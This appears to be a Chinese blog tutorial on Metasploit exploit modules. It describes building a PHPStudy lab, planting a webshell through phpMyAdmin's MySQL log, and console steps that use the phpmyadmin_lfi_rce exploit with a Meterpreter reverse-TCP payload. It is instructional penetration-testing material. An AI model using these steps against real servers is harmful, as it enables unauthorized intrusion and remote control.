Metasploit漏洞利用模块(一)

本文介绍了如何使用PHPStudy快速搭建PHP测试环境,并详细阐述了配置漏洞测试环境的步骤,包括新建用户、权限分配和服务设置。接着,讨论了通过phpmyadmin日志写shell的方法及安全风险,提到了Meterpreter常用命令。同时,文章提供了漏洞扫描与利用的实战演示,涉及phpmyadmin的远程文件包含漏洞。最后,强调了安全防护和Meterpreter命令在渗透测试中的重要性。
摘要由CSDN通过智能技术生成

一、快速搭建有限制的测试环境

使用PHPstudy快速进行环境配置

在百度百科上对于phpstudy的定义是一个PHP调试环境的程序集成包

Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境,该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等

下载地址:http://www.phpstudy.net

配置问题:https://www.xp.cn/wenda/388.html

运行库:http://www.php.cn/xiazai/gongju/1351

 

二、配置漏洞测试环境

1、新建用户www

2、权限分配

3、服务设置登录用户

先属性里面的高级设置,添加用户权限,然后再去设置用户的权限

三、phpmyadmin获取webshell

Phpmyadmin日志写shell 

前提:条件是root用户 

思路:就是利用mysql的一个日志文件。这个日志文件没执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之

设置导出文件: 

 

参考文章:https://www.jianshu.com/p/ddd41b841c36

实战演示:phpmyadmin

从漏洞扫描到漏洞利用

1)扫描靶机

msf > auxiliary/scanner/http/phpmyadmin_login 

2)选择exploit

msf> use exploit/multi/http/phpmyadmin_lfi_rce

3)选择payload

set payload php/meterpreter/reverse_tcp

4)攻击

run/exploit 

phpmyadmin4.8.1远程文件包含漏洞:https://www.jianshu.com/p/0d75017c154f

反弹shell

 

参考文章:https://xz.aliyun.com/t/2549

四、Meterpreter常用命令

 

参考地址:https://www.cnblogs.com/backlion/p/9484949.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值